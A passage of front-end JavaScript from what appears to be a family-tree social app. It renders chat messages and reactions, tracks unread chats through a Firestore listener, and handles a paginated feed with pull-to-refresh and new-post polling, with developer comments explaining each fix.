                    Object.entries(reactions).map(([emoji, users]) =>
                        `<button data-conv-id="${escapeHtml(conversation.id)}" data-msg-id="${escapeHtml(msg.id)}" data-emoji="${escapeHtml(emoji)}" onclick="reactToMessage(this.dataset.convId, this.dataset.msgId, this.dataset.emoji)"
                            class="inline-flex items-center gap-1 px-2 py-0.5 text-xs rounded-full ${users.includes(appState.currentUserNeo4jId) ? 'bg-blue-100 ring-1 ring-blue-300' : 'bg-gray-100 hover:bg-gray-200'} transition-colors">
                            ${escapeHtml(emoji)} ${users.length}
                        </button>`
                    ).join('') : '';

                // Message content
                let contentHTML = '';
                if (msg.fileUrl) {
                    const isImage = msg.fileType?.startsWith('image/');
                    const fileUrlSafe = escapeHtml(msg.fileUrl);
                    const fileNameSafe = escapeHtml(msg.fileName || 'Download file');
                    contentHTML = isImage ?
                        `<img src="${fileUrlSafe}" alt="${escapeHtml(msg.fileName || 'attachment')}" class="max-w-xs rounded-lg cursor-pointer" data-file-url="${fileUrlSafe}" onclick="window.open(this.dataset.fileUrl, '_blank')">` :
                        `<a href="${fileUrlSafe}" target="_blank" class="flex items-center gap-2 px-3 py-2 bg-white bg-opacity-20 rounded hover:bg-opacity-30 transition-colors">
                            ${tablerIcon('upload', { size: 20, preserveColor: true })}
                            <span>${fileNameSafe}</span>
                        </a>`;
                    if (msg.text) contentHTML += `<p class="mt-2">${escapeHtml(msg.text)}</p>`;
                } else {
                    contentHTML = `<p>${escapeHtml(msg.text)}</p>`;
                }

                return `
                    ${dateHeader}
                    <div class="flex ${isMe ? 'justify-end' : 'justify-start'} mb-3 group">
                        ${!isMe ? `<div class="flex-shrink-0 mr-2">
                            <div class="w-8 h-8 rounded-full bg-gradient-to-br from-primary to-purple-600 flex items-center justify-center text-white text-xs font-semibold">
                                ${escapeHtml(initials)}
                            </div>
                        </div>` : ''}
                        <div class="max-w-[70%]">
                            ${!isMe ? `<div class="text-xs text-gray-500 mb-1 ml-1">${escapeHtml(senderName)}</div>` : ''}
                            <div class="relative">
                                <div class="px-4 py-2 rounded-2xl ${isMe ? 'bg-primary text-white' : 'bg-gray-100 text-gray-900'} shadow-sm">
                                    ${contentHTML}
                                </div>
                                <!-- Reaction button -->
                                <button data-conv-id="${escapeHtml(conversation.id)}" data-msg-id="${escapeHtml(msg.id)}" onclick="showReactionPicker(this.dataset.convId, this.dataset.msgId)"
                                    class="absolute ${isMe ? 'left-0 -ml-8' : 'right-0 -mr-8'} top-1/2 -translate-y-1/2 w-6 h-6 bg-white border border-gray-200 rounded-full flex items-center justify-center opacity-0 group-hover:opacity-100 transition-opacity shadow hover:shadow-md"
                                    title="React">
                                    <span class="text-xs">😊</span>
                                </button>
                            </div>
                            <div class="flex items-center gap-1 mt-1 ${isMe ? 'justify-end' : 'justify-start'}">
                                <span class="text-xs text-gray-400">${timeDisplay}</span>
                                ${msg.read && isMe ? '<span class="text-xs text-gray-400">✓✓</span>' : ''}
                            </div>
                            ${reactionDisplay ? `<div class="flex gap-1 mt-1">${reactionDisplay}</div>` : ''}
                        </div>
                    </div>
                `;
            }).join('');
        }

        // Prompt 17: global chat unread indicator. Persistent Firestore
        // listener over the user's conversations feeds a dot on all
        // three Chat entry points (sidebar, mobile drawer, mobile
        // bottom-nav).
        //
        // Model: each conversation doc carries lastRead: {<userId>:
        // timestamp}. Missing entry = never read (so fresh accounts
        // correctly light up on the welcome DM). Writes fire client-
        // side from selectConversation + on every incoming message
        // snapshot while the convo is on-screen. hasUnread =
        // any(lastUpdated > lastRead[me] ?? 0) excluding convos
        // where I sent the last message.
        //
        // Attached at auth-in success (after currentUserNeo4jId is set)
        // and detached at logout. Deliberately NOT stored in
        // appState.firestoreUnsubscribe — that one gets torn down on
        // every navigateToView and would make the dot stop updating
        // as soon as the user leaves Chat.
        function _tsMillis(ts) {
            // Firestore Timestamp shape: JS SDK returns Timestamp
            // objects with toMillis() OR seconds-based dicts from
            // the backend serializer. This helper handles both plus
            // number + null.
            if (!ts) return 0;
            if (typeof ts === 'number') return ts;
            if (typeof ts.toMillis === 'function') return ts.toMillis();
            if (typeof ts.seconds === 'number') return ts.seconds * 1000 + Math.floor((ts.nanoseconds || 0) / 1e6);
            if (typeof ts._seconds === 'number') return ts._seconds * 1000 + Math.floor((ts._nanoseconds || 0) / 1e6);
            return 0;
        }
        // Cache the last computed hasUnread so navigateToView (which
        // rebuilds the sidebar / mobile nav / drawer chrome, dropping
        // the toggle state on the DOM elements) can re-apply the dot
        // without waiting for the next Firestore snapshot. The listener
        // callback + selectConversation both update it.
        let _lastChatHasUnread = false;
        function _setChatUnreadIndicator(hasUnread) {
            _lastChatHasUnread = !!hasUnread;
            // Session 2c: includes native tab bar's Chat dot too.
            const dots = document.querySelectorAll('.ebw-chat-unread-dot, .ebw-native-tab-unread');
            dots.forEach(d => d.classList.toggle('hidden', !hasUnread));
        }
        function _reapplyChatUnreadIndicator() {
            // Called from renderApp after each rebuild. If the listener
            // hasn't fired yet (fresh session), this is a no-op — the
            // dot stays hidden as the default HTML class dictates.
            _setChatUnreadIndicator(_lastChatHasUnread);
        }
        window._reapplyChatUnreadIndicator = _reapplyChatUnreadIndicator;
        function startUnreadIndicatorListener() {
            // Belt against re-entry (auth state can bounce briefly
            // on token refresh) — one listener at a time.
            if (appState.unreadUnsubscribe) {
                try { appState.unreadUnsubscribe(); } catch (_) {}
                appState.unreadUnsubscribe = null;
            }
            const myId = appState.currentUserNeo4jId;
            if (!db || myId === null || myId === undefined) return;
            // 2026-10-15: participant-scoped Firestore rules key on
            // participantFirebaseUids (array of Firebase UIDs). The
            // list query's where() filter must match the rule's
            // predicate — rules only permit list when the filter
            // narrows to results the user can read. Switched from
            // 'participants' (Neo4j ids) to 'participantFirebaseUids'
            // (Firebase UIDs) so the query matches request.auth.uid.
            // Fall back silently if no Firebase user available.
            const firebaseUid = appState.currentUser && appState.currentUser.uid;
            if (!firebaseUid) return;
            try {
                // Local var renamed from `query` to `unreadQuery` to avoid
                // shadowing the imported query() function from firebase/firestore.
                const unreadQuery = query(
                    collection(db, 'conversations'),
                    where('participantFirebaseUids', 'array-contains', firebaseUid)
                );
                appState.unreadUnsubscribe = onSnapshot(unreadQuery, snap => {
                    let hasUnread = false;
                    snap.forEach(doc => {
                        if (hasUnread) return; // early-exit: one is enough
                        const d = doc.data() || {};
                        // Never light on your own outgoing messages —
                        // covers the case where I send a message and
                        // the listener fires before I've read it (in
                        // practice I have; sender's outgoing side has
                        // no "unread" semantics).
                        if (d.lastMessageSenderId === myId) return;
                        const updated = _tsMillis(d.lastUpdated);
                        if (!updated) return; // convo with no messages yet
                        const readMap = d.lastRead || {};
                        const lastRead = _tsMillis(readMap[myId]);
                        if (updated > lastRead) hasUnread = true;
                    });
                    _setChatUnreadIndicator(hasUnread);
                }, err => {
                    console.error('Unread listener error:', err);
                });
            } catch (e) {
                console.error('Failed to start unread listener:', e);
            }
        }
        function stopUnreadIndicatorListener() {
            if (appState.unreadUnsubscribe) {
                try { appState.unreadUnsubscribe(); } catch (_) {}
                appState.unreadUnsubscribe = null;
            }
            _setChatUnreadIndicator(false);
        }
        function markConversationReadInFirestore(conversationId) {
            // Writes lastRead[currentUser] = serverTimestamp on the
            // convo doc. Called from selectConversation (once on open)
            // and again on each incoming-message snapshot while the
            // convo is on-screen. Firestore rules are auth-gated (per
            // the 2026-07-15 rules deploy) so this succeeds for any
            // convo the caller can already read; a future participant-
            // scoped rules pass MUST include lastRead writes.
            const myId = appState.currentUserNeo4jId;
            if (!db || myId === null || myId === undefined || !conversationId) return;
            try {
                updateDoc(doc(db, 'conversations', conversationId), {
                    [`lastRead.${myId}`]: serverTimestamp(),
                }).catch(err => {
                    console.warn('lastRead write failed:', err);
                });
            } catch (e) {
                console.warn('lastRead write threw:', e);
            }
        }
        window.startUnreadIndicatorListener = startUnreadIndicatorListener;
        window.stopUnreadIndicatorListener = stopUnreadIndicatorListener;

        async function markConversationRead(conversationId) {
            try {
                await apiFetch(`${API_BASE_URL}/conversations/${conversationId}/mark-read`, { method: 'POST' });
                // Refresh conversation list to update unread counts
                const convoIndex = appState.conversations.findIndex(c => c.id === conversationId);
                if (convoIndex !== -1) {
                    appState.conversations[convoIndex].unread_count = 0;
                }
            } catch (error) {
                console.error('Error marking conversation as read:', error);
            }
        }

        async function reactToMessage(conversationId, messageId, emoji) {
            try {
                await apiFetch(`${API_BASE_URL}/conversations/${conversationId}/messages/${messageId}/react`, {
                    method: 'POST',
                    body: { reaction: emoji }
                });
            } catch (error) {
                console.error('Error reacting to message:', error);
                alert('Failed to add reaction');
            }
        }

        function showReactionPicker(conversationId, messageId) {
            const reactions = ['👍', '❤️', '😂', '😮', '😢', '🎉'];
            const picker = document.createElement('div');
            picker.className = 'fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-30';
            picker.innerHTML = `
                <div class="bg-white rounded-lg p-4 shadow-xl">
                    <div class="flex gap-2">
                        ${reactions.map(emoji => `
                            <button onclick="reactToMessage('${conversationId}', '${messageId}', '${emoji}'); this.closest('.fixed').remove();"
                                class="w-12 h-12 text-2xl hover:bg-gray-100 rounded-lg transition-colors">
                                ${emoji}
                            </button>
                        `).join('')}
                    </div>
                </div>
            `;
            picker.onclick = (e) => {
                if (e.target === picker) picker.remove();
            };
            document.body.appendChild(picker);
        }

        // --- FEED FUNCTIONS ---
        // Pagination state
        let feedState = {
            offset: 0,
            hasMore: true,
            loading: false
        };

        async function fetchAndRenderFeed(reset = true, force = false) {
            const feedContainer = document.getElementById('feed-container');
            if (!feedContainer) return;

            if (reset) {
                feedState.offset = 0;
                feedState.hasMore = true;
                // Only show skeleton loaders on the initial load
                // (empty container OR previously showing skeletons).
                // On a refresh where real content is already visible,
                // leave it in place — the fetch runs in the background
                // and swaps content on completion. Removes the
                // "flash of skeleton boxes" that felt like a full
                // page-wipe on every refresh, especially on empty feeds
                // where the skeleton boxes falsely promised incoming
                // posts.
                const alreadyHasContent = feedContainer.children.length > 0
                    && !feedContainer.querySelector('[data-skeleton-loader]');
                if (!alreadyHasContent) {
                    feedContainer.innerHTML = renderSkeletonLoaders(3);
                }
            }

            // Skip loading check if force=true (e.g., after posting)
            if (!force && (feedState.loading || !feedState.hasMore)) return;

            feedState.loading = true;

            try {
                // Cache-bust the feed URL — Cloud Run doesn't send strict
                // no-store, so a repeated GET of the same offset+limit can
                // return a stale browser-cached response after any mutation.
                // Symptom this closes: clicking the "New posts available"
                // pill removed the pill but the feed didn't refresh until
                // a full page reload revalidated the cache.
                const response = await apiFetch(
                    `${API_BASE_URL}/feed?offset=${feedState.offset}&limit=20&_=${Date.now()}`
                );

                // Handle new paginated response format
                const posts = response.posts || response; // Fallback for backwards compatibility
                const hasMore = response.hasMore !== undefined ? response.hasMore : false;
                const nextOffset = response.nextOffset || feedState.offset + posts.length;

                if (reset && posts.length === 0) {
                    // Empty feed still gets the headline slot card
                    // (cultural doodle OR H1/H2 house ad, per one-slot
                    // rule from ad-banner-brief.md) so a user with no
                    // posts still sees the invite/photo nudge. Without
                    // this, refreshing on an empty feed showed only
                    // skeleton flash → empty state, with no promo card
                    // between renders.
                    feedContainer.innerHTML = renderAfricanCultureCard(0) + renderFeedCalendarCard() + ebwEmptyState({
                        icon: 'notes',
                        heading: 'Nothing here yet',
                        body: 'Share your first story — a memory, a photo, an ordinary Tuesday. Family members on this tree will see it.',
                        primaryAction: { label: '+ Create a post', onclick: "openModal('create-post-modal')" },
                        learnMoreAnchor: 'posts',
                    });
                    feedState.hasMore = false;
                    _populateFeedCalendarCard();
                } else {
                    // Insert ads and cultural doodles at different intervals
                    const postsWithAds = [];

                    // Always show a cultural doodle + Family Calendar card at
                    // the top of the feed on initial load. Doodle first (heritage
                    // storytelling anchor), Calendar card second (upcoming family
                    // events — birthdays, memorial anniversaries — replaces the
                    // Calendar entry that used to live in the sidebar/hamburger).
                    if (reset && feedState.offset === 0) {
                        postsWithAds.push(renderAfricanCultureCard(0));
                        postsWithAds.push(renderFeedCalendarCard());
                    }

                    posts.forEach((post, index) => {
                        postsWithAds.push(renderFeedPost(post));

                        const globalIndex = feedState.offset - posts.length + index + 1;

                        // Insert African cultural doodle after every 3 posts.
                        // House ads (H1 invite / H2 photo analysis) are folded
                        // into this rotation for non-User-0 audiences via the
                        // renderAfricanCultureCard 5-type pool (one-slot rule
                        // per ad-banner-brief.md).
                        if ((globalIndex) % 3 === 0 && globalIndex > 0) {
                            postsWithAds.push(renderAfricanCultureCard(globalIndex));
                        }
                    });

                    const postsHTML = postsWithAds.join('');

                    if (reset) {
                        feedContainer.innerHTML = postsHTML;

                        // Session 2c: populate the Family Calendar card
                        // (birthdays + memorial anniversaries in next 30 days)
                        // now that the card DOM exists in the feed. Reads
                        // from appState.personsInTree — if that hasn't loaded
                        // yet, the card shows a quiet "See upcoming …" fallback.
                        _populateFeedCalendarCard();

                        // Set latest post timestamp for real-time updates (only on reset/initial load)
                        if (posts.length > 0) {
                            latestPostTimestamp = new Date(posts[0].createdAt).getTime();
                        }
                    } else {
                        // Remove loading indicator if exists
                        const loadingIndicator = document.getElementById('loading-more');
                        if (loadingIndicator) loadingIndicator.remove();

                        // Append new posts
                        feedContainer.insertAdjacentHTML('beforeend', postsHTML);
                    }

                    feedState.offset = nextOffset;
                    feedState.hasMore = hasMore;

                    // Add "Load More" button or loading indicator if there are more posts
                    if (hasMore) {
                        addLoadMoreTrigger();
                    }
                }
            } catch (error) {
                console.error("Error fetching feed:", error);
                if (reset) {
                    // Session 2c Task 5: friendlier offline message. Feed lives
                    // on Cloud Run (not Firestore's IndexedDB cache), so offline
                    // = no fresh posts. Distinguish that from a real error.
                    // Include the in-Feed Calendar card because it's client-side
                    // computed from personsInTree — likely still works offline.
                    let isOffline = false;
                    if (typeof window.nativeGetNetworkStatus === 'function') {
                        isOffline = !window.nativeGetNetworkStatus().connected;
                    } else if (typeof navigator !== 'undefined' && 'onLine' in navigator) {
                        isOffline = !navigator.onLine;
                    }
                    const offlineHtml = `
                        <div class="p-6 text-center bg-amber-50 border border-amber-200 rounded-lg mx-2">
                            <div class="text-sm font-semibold text-amber-900 mb-1">You're offline</div>
                            <p class="text-xs text-amber-800">Your feed will refresh when you reconnect. Family calendar and tree still work below.</p>
                        </div>`;
                    const errorHtml = `<p class="text-center text-error">Could not load feed. Pull down to retry.</p>`;
                    feedContainer.innerHTML = renderAfricanCultureCard(0) + renderFeedCalendarCard()
                        + (isOffline ? offlineHtml : errorHtml);
                    _populateFeedCalendarCard();
                }
            } finally {
                feedState.loading = false;
            }
        }

        function renderSkeletonLoaders(count = 3) {
            const skeletons = [];
            for (let i = 0; i < count; i++) {
                skeletons.push(`
                    <div class="p-6 mb-4 rounded-lg shadow-sm bg-surface animate-pulse" data-skeleton-loader="true">
                        <div class="flex items-center space-x-3 mb-4">
                            <div class="w-10 h-10 bg-gray-300 rounded-full"></div>
                            <div class="flex-1">
                                <div class="h-4 bg-gray-300 rounded w-24 mb-2"></div>
                                <div class="h-3 bg-gray-300 rounded w-32"></div>
                            </div>
                        </div>
                        <div class="space-y-2">
                            <div class="h-4 bg-gray-300 rounded w-full"></div>
                            <div class="h-4 bg-gray-300 rounded w-5/6"></div>
                        </div>
                    </div>
                `);
            }
            return skeletons.join('');
        }

        function addLoadMoreTrigger() {
            const feedContainer = document.getElementById('feed-container');
            if (!feedContainer) return;

            // Remove existing trigger if any
            const existingTrigger = document.getElementById('load-more-trigger');
            if (existingTrigger) existingTrigger.remove();

            // Add invisible trigger element for intersection observer
            const trigger = document.createElement('div');
            trigger.id = 'load-more-trigger';
            trigger.className = 'h-20 flex items-center justify-center';
            trigger.innerHTML = '<div id="loading-more" class="text-gray-500">Loading more posts...</div>';
            feedContainer.appendChild(trigger);

            // Set up intersection observer for infinite scroll
            const observer = new IntersectionObserver(
                (entries) => {
                    entries.forEach(entry => {
                        if (entry.isIntersecting && feedState.hasMore && !feedState.loading) {
                            fetchAndRenderFeed(false);
                        }
                    });
                },
                { rootMargin: '100px' }
            );

            observer.observe(trigger);
        }

        // Pull-to-refresh functionality
        let pullToRefreshState = {
            startY: 0,
            currentY: 0,
            pulling: false,
            threshold: 80
        };

        function initializePullToRefresh() {
            const feedContainer = document.getElementById('feed-container');
            if (!feedContainer) return;

            // Idempotency guard: initializePullToRefresh is called every time
            // the user enters feed-view. Without this guard, each visit adds a
            // new touch listener set + a new #refresh-indicator div, and old
            // handlers keep firing against orphaned closure state. Symptom on
            // Tecno Spark Go during Session 2c: refresh bar stayed visible
            // because the ACTIVE-in-view indicator was #N but touchend was
            // resetting #N-1's state. Guard makes init idempotent — subsequent
            // calls no-op. Session 2c fix.
            if (initializePullToRefresh._initialized) return;
            initializePullToRefresh._initialized = true;

            // Create pull-to-refresh indicator
            const refreshIndicator = document.createElement('div');
            refreshIndicator.id = 'refresh-indicator';
            refreshIndicator.className = 'fixed top-0 left-0 right-0 flex items-center justify-center bg-primary text-white py-2 transform -translate-y-full transition-transform duration-200 z-50';
            refreshIndicator.innerHTML = '<span class="text-sm">↓ Pull to refresh</span>';
            document.body.insertBefore(refreshIndicator, document.body.firstChild);

            let touchStartY = 0;
            let pullDistance = 0;

            // Gate the pull-to-refresh gesture. Handlers are global on
            // document (once attached they persist across page navigation),
            // so we need runtime checks: only fire when actually on Feed
            // AND no modal is open. Otherwise a pull inside a modal on any
            // page triggers the refresh indicator + fetchAndRenderFeed,
            // which flashes / overlays the modal (both use z-50).
            const _isP2RActive = () => {
                if (appState.currentView !== 'feed-view') return false;
                // Any modal currently open? Modals lose .pointer-events-none
                // when transitioned to visible state.
                const openModal = document.querySelector('.modal-overlay:not(.pointer-events-none)');
                if (openModal) return false;
                return true;
            };

            // Hard-timeout fallback: if pulling state is still true 5s after
            // touchstart, force reset. Session 2c on-device smoke surfaced a
            // sticking bar on the Tecno Spark Go — probably HiOS not delivering
            // touchend/touchcancel reliably after certain gestures. This is
            // belt-and-suspenders that guarantees the indicator can't stay
            // stuck forever regardless of what fires or doesn't.
            let _p2rTimeoutHandle = null;

            document.addEventListener('touchstart', (e) => {
                if (!_isP2RActive()) return;
                // Only activate if at top of page
                if (window.scrollY === 0) {
                    touchStartY = e.touches[0].clientY;
                    pullToRefreshState.pulling = true;
                    if (_p2rTimeoutHandle) clearTimeout(_p2rTimeoutHandle);
                    _p2rTimeoutHandle = setTimeout(() => {
                        if (pullToRefreshState.pulling) {
                            console.warn('[P2R] hard-timeout force reset — touchend/cancel never fired');
                            _resetP2R();
                        }
                    }, 5000);
                }
            }, { passive: true });

            // Shared cleanup — resets ALL state + indicator. Called from every
            // exit path (touchend success, touchend guard, touchcancel, and
            // the touchmove guard rail). Previously touchmove-guard only
            // reset `pulling` + transform but not pullDistance, so a later
            // touchend could still see pullDistance > threshold and fire a
            // ghost refresh + stick the indicator visible. 2026-09-15 fix.
            const _resetP2R = () => {
                pullToRefreshState.pulling = false;
                pullDistance = 0;
                refreshIndicator.style.transform = 'translateY(-100%)';
                refreshIndicator.innerHTML = '<span class="text-sm">↓ Pull to refresh</span>';
                if (_p2rTimeoutHandle) {
                    clearTimeout(_p2rTimeoutHandle);
                    _p2rTimeoutHandle = null;
                }
            };

            document.addEventListener('touchmove', (e) => {
                if (!pullToRefreshState.pulling) return;
                if (!_isP2RActive()) {
                    // Guard rail: a modal opened after touchstart, or view swapped.
                    _resetP2R();
                    return;
                }

                const currentY = e.touches[0].clientY;
                pullDistance = currentY - touchStartY;

                // Only show indicator if pulling down
                if (pullDistance > 0) {
                    const translateY = Math.min(pullDistance / 2, pullToRefreshState.threshold);
                    refreshIndicator.style.transform = `translateY(${translateY}px)`;

                    if (pullDistance > pullToRefreshState.threshold) {
                        refreshIndicator.innerHTML = '<span class="text-sm">↑ Release to refresh</span>';
                    } else {
                        refreshIndicator.innerHTML = '<span class="text-sm">↓ Pull to refresh</span>';
                    }
                }
            }, { passive: true });

            document.addEventListener('touchend', async () => {
                if (!pullToRefreshState.pulling) return;

                if (!_isP2RActive() || pullDistance <= pullToRefreshState.threshold) {
                    _resetP2R();
                    return;
                }

                // Refresh path — indicator stays visible while fetch runs,
                // then setTimeout hides it. Wrap in try/finally so a fetch
                // failure (network, CORS, etc.) still tears down the state.
                pullToRefreshState.pulling = false;
                refreshIndicator.innerHTML = `<span class="text-sm inline-flex items-center gap-2">${tablerIcon('reload', { size: 14 })} Refreshing...</span>`;
                refreshIndicator.style.transform = 'translateY(0)';
                try {
                    await fetchAndRenderFeed(true);
                } catch (err) {
                    console.warn('pull-to-refresh: fetch failed:', err);
                } finally {
                    setTimeout(() => {
                        _resetP2R();
                    }, 500);
                }
            });

            // touchcancel fires when the browser/OS cancels the touch (system
            // gesture takeover, view swap mid-gesture, etc.). Native Android
            // WebView delivers this in more scenarios than desktop, so wiring
            // it explicitly closes the "stuck bar" edge case where touchend
            // never fires after an interrupted pull.
            document.addEventListener('touchcancel', () => {
                if (pullToRefreshState.pulling) _resetP2R();
            }, { passive: true });
        }

        // Real-time updates notification
        let newPostsCheckInterval = null;
        let latestPostTimestamp = null;
        let justPosted = false; // Flag to suppress notifications right after posting

        function startNewPostsMonitoring() {
            // Check for new posts every 30 seconds
            if (newPostsCheckInterval) {
                clearInterval(newPostsCheckInterval);
            }

            // Note: latestPostTimestamp is set in fetchAndRenderFeed() when posts are loaded

            newPostsCheckInterval = setInterval(async () => {
                try {
                    // Fetch only the first post to check if there are new ones.
                    // Cache-bust so a repeat of the same URL doesn't return
                    // a stale browser-cached response.
                    const response = await apiFetch(
                        `${API_BASE_URL}/feed?offset=0&limit=1&_=${Date.now()}`
                    );
                    const posts = response.posts || response;

                    if (posts.length > 0) {
                        const newestPostTime = new Date(posts[0].createdAt).getTime();

                        console.log('Checking for new posts:', {
                            latestPostTimestamp: new Date(latestPostTimestamp).toISOString(),
                            newestPostTime: new Date(newestPostTime).toISOString(),
                            hasNewPosts: newestPostTime > latestPostTimestamp
                        });

                        // If there's a newer post than what we have, show notification
                        // But suppress if we just posted (to avoid showing notification for our own post)
                        if (latestPostTimestamp && newestPostTime > latestPostTimestamp && !justPosted) {
                            console.log('New posts detected! Showing notification.');
                            showNewPostsNotification();
                        }
                    }
                } catch (error) {
                    console.error('Error checking for new posts:', error);
                }
            }, 30000); // Check every 30 seconds
        }

        function showNewPostsNotification() {
            // Remove existing notification if any
            const existingNotif = document.getElementById('new-posts-notification');
            if (existingNotif) return; // Don't show duplicate notifications

            // Create notification banner
            const notification = document.createElement('div');
            notification.id = 'new-posts-notification';
            notification.className = 'fixed top-16 left-1/2 transform -translate-x-1/2 bg-primary text-white px-6 py-3 rounded-full shadow-lg cursor-pointer hover:bg-primary-dark transition-all z-50 animate-bounce';
            notification.innerHTML = `
                <div class="flex items-center space-x-2">
                    <span>✨ New posts available</span>
                    <span class="text-sm opacity-75">Tap to refresh</span>
                </div>
            `;

            notification.addEventListener('click', async () => {
                notification.remove();
                await fetchAndRenderFeed(true);
                // latestPostTimestamp is updated in fetchAndRenderFeed
            });

            document.body.appendChild(notification);

            // Auto-hide after 10 seconds
            setTimeout(() => {
                if (notification.parentNode) {
                    notification.style.opacity = '0';
                    notification.style.transform = 'translate(-50%, -20px)';
                    setTimeout(() => notification.remove(), 300);
                }
            }, 10000);
        }

        function stopNewPostsMonitoring() {
            if (newPostsCheckInterval) {
                clearInterval(newPostsCheckInterval);
                newPostsCheckInterval = null;
            }
        }

        function renderFeedPost(post) {
            const createdRelative = formatRelativeTime(post.createdAt);
            const createdFull = formatFullTimestamp(post.createdAt);
            const authorName = post.author?.name || 'Unknown';

            // F23: cache the post's photos array in the shape the lightbox
            // expects ({signedUrl, caption?, id?}). Videos in a mediaUrls
            // carousel are filtered out — lightbox is photo-only. Cache
            // keyed by post id so the tap handler can look up without
            // JSON-serialising URLs into onclick attributes.
            const feedPhotos = [];
            if (post.mediaUrls && post.mediaUrls.length > 0) {
                post.mediaUrls.forEach(item => {
                    if (item.type === 'photo') {
                        feedPhotos.push({ signedUrl: item.url, caption: item.caption || '', id: item.id });
                    }
                });
            } else if (post.photoUrls && post.photoUrls.length > 0) {
                post.photoUrls.forEach(url => { feedPhotos.push({ signedUrl: url }); });
            }
            if (feedPhotos.length > 0) _ebwFeedPhotoCache.set(post.id, feedPhotos);

            const privacyIcon = post.privacy === 'private'
                ? tablerIcon('lock', { size: 14 })
                : post.privacy === 'family'
                    ? tablerIcon('users', { size: 14 })
                    : tablerIcon('world', { size: 14 });
            const likeCount = post.likeCount || 0;
            const commentCount = post.commentCount || 0;
            const userLiked = post.userLiked || false;
            const likeButtonClass = userLiked ? 'text-red-500' : 'text-gray-500';
            const likeIcon = userLiked ? '❤️' : '🤍';
            const isPinned = post.pinned || false;

            // Check if current user is the author
            const isAuthor = post.author && post.author.id === appState.currentUserNeo4jId;
            // Phase 3: private author → initials avatar, no photo. Backend
            // surfaces post.author.privacy_mode from the linked Person (via
            // REPRESENTS). Author viewing own post always sees own photo.
            const authorIsPrivate = post.author && post.author.privacy_mode === 'private' && !isAuthor;
            const showAuthorPhoto = !authorIsPrivate && post.author?.avatarUrl;

            return `
                <div class="p-3 sm:p-6 mb-3 sm:mb-4 rounded-lg shadow-sm bg-surface ${isPinned ? 'border-2 border-primary' : ''}" data-post-id="${post.id}">
                    ${isPinned ? `<div class="mb-2 text-xs sm:text-sm font-semibold text-primary inline-flex items-center gap-1">${tablerIcon('pin', { size: 14 })} Pinned Post</div>` : ''}
                    <div class="flex items-center justify-between mb-3 sm:mb-4">
                        <div class="flex items-center space-x-2 sm:space-x-3">
                            <div class="flex items-center justify-center w-8 h-8 sm:w-10 sm:h-10 text-sm sm:text-base text-white rounded-full bg-primary overflow-hidden">
                                ${showAuthorPhoto
                                    ? `<img src="${post.author.avatarUrl}" class="w-full h-full object-cover" alt="${escapeHtml(authorName)}" loading="lazy" onerror="_imgFallback(this, 'avatar', {initials: '${nameInitials(authorName).replace(/'/g, "\\'")}'})">`
                                    : nameInitials(authorName)}
                            </div>
                            <div>
                                <p class="text-base font-semibold text-gray-800">${authorName}</p>
                                <p class="text-sm text-gray-500" title="${escapeHtml(createdFull)}">${escapeHtml(createdRelative)}</p>
                            </div>
                        </div>
                        <div class="flex items-center space-x-1 sm:space-x-2">
                            <span class="text-sm text-gray-500 hidden sm:inline">${privacyIcon} ${post.privacy}</span>
                            <span class="text-base sm:hidden">${privacyIcon}</span>
                            ${isAuthor ? `
                                <div class="relative">
                                    <button onclick="togglePostMenu(${post.id})" class="p-3 md:p-2 text-gray-500 transition-colors rounded-full hover:bg-gray-100 hover:text-gray-700 active:bg-gray-200">
                                        ${tablerIcon('dots-vertical', { size: 20, preserveColor: true })}
                                    </button>
                                    <div id="post-menu-${post.id}" class="absolute right-0 z-10 hidden w-48 mt-2 bg-white border border-gray-200 rounded-lg shadow-lg">
                                        <button onclick='openEditPostModal(${JSON.stringify(post)}); closePostMenu(${post.id})' class="flex items-center w-full px-4 py-2 text-sm text-left text-gray-700 hover:bg-gray-100">
                                            ${tablerIcon('pencil', { size: 16, preserveColor: true })}
                                            Edit Post
                                        </button>
                                        <button onclick="togglePinPost(${post.id}, ${isPinned}); closePostMenu(${post.id})" class="flex items-center w-full px-4 py-2 text-sm text-left text-gray-700 hover:bg-gray-100">
                                            ${tablerIcon('bookmark', { size: 16, preserveColor: true })}
                                            ${isPinned ? 'Unpin' : 'Pin'} Post
                                        </button>
                                        <button onclick="confirmDeletePost(${post.id}); closePostMenu(${post.id})" class="flex items-center w-full px-4 py-2 text-sm text-left text-red-600 hover:bg-red-50">
                                            <span class="mr-2">${tablerIcon('trash', { size: 16, preserveColor: true })}</span>
                                            Delete Post
                                        </button>
                                    </div>
                                </div>
                            ` : ''}
                        </div>
                    </div>
                    <div class="mb-3 sm:mb-4 text-base text-gray-700 whitespace-pre-wrap">${escapeHtml(post.content)}</div>

                    <!-- Mixed Media Carousel (Photos + Videos) -->
                    ${post.mediaUrls && post.mediaUrls.length > 0 ? `
                        <div class="mt-3 mb-3 sm:mt-4 sm:mb-4 relative">
                            ${post.mediaUrls.length === 1 ? `
                                <!-- Single Media Item. F23: w-auto max-w-full
                                     lets the photo size to its intrinsic
                                     width up to the container edge, killing
                                     the gray letterbox slabs that object-
                                     contain on w-full produced for portrait
                                     photos. mx-auto centers a narrower
                                     portrait shot horizontally. -->
                                ${post.mediaUrls[0].type === 'photo' ? `
                                    <img src="${post.mediaUrls[0].url}" alt="Post photo" class="block w-auto max-w-full max-h-80 md:max-h-96 mx-auto rounded-lg cursor-zoom-in" loading="lazy" onclick="openFeedPhotoLightbox(${post.id}, 0)" onerror="_imgFallback(this, 'photo')">
                                ` : `
                                    <video controls preload="none" class="w-full rounded-lg bg-black max-h-64 md:max-h-96">
                                        <source src="${post.mediaUrls[0].url}">
                                        Your browser does not support the video tag.
                                    </video>
                                `}
                            ` : `
                                <!-- Mixed Media Carousel -->
                                <div id="carousel-${post.id}" class="relative">
                                    <div class="rounded-lg bg-gray-100 min-h-60 md:min-h-80">
                                        ${post.mediaUrls.map((item, index) => {
                                            if (item.type === 'photo') {
                                                // F23: photo-only index for the lightbox
                                                // — videos are filtered out of feedPhotos
                                                // so the array positions differ from the
                                                // carousel positions in mixed-media posts.
                                                const photoIdx = post.mediaUrls.slice(0, index).filter(m => m.type === 'photo').length;
                                                return `<img src="${item.url}" alt="Photo ${index + 1}" class="w-full max-h-80 md:max-h-96 object-contain cursor-zoom-in ${index === 0 ? '' : 'hidden'}" data-carousel-item="${post.id}-${index}" loading="lazy" onclick="openFeedPhotoLightbox(${post.id}, ${photoIdx})" onerror="_imgFallback(this, 'photo')">`;
                                            } else {
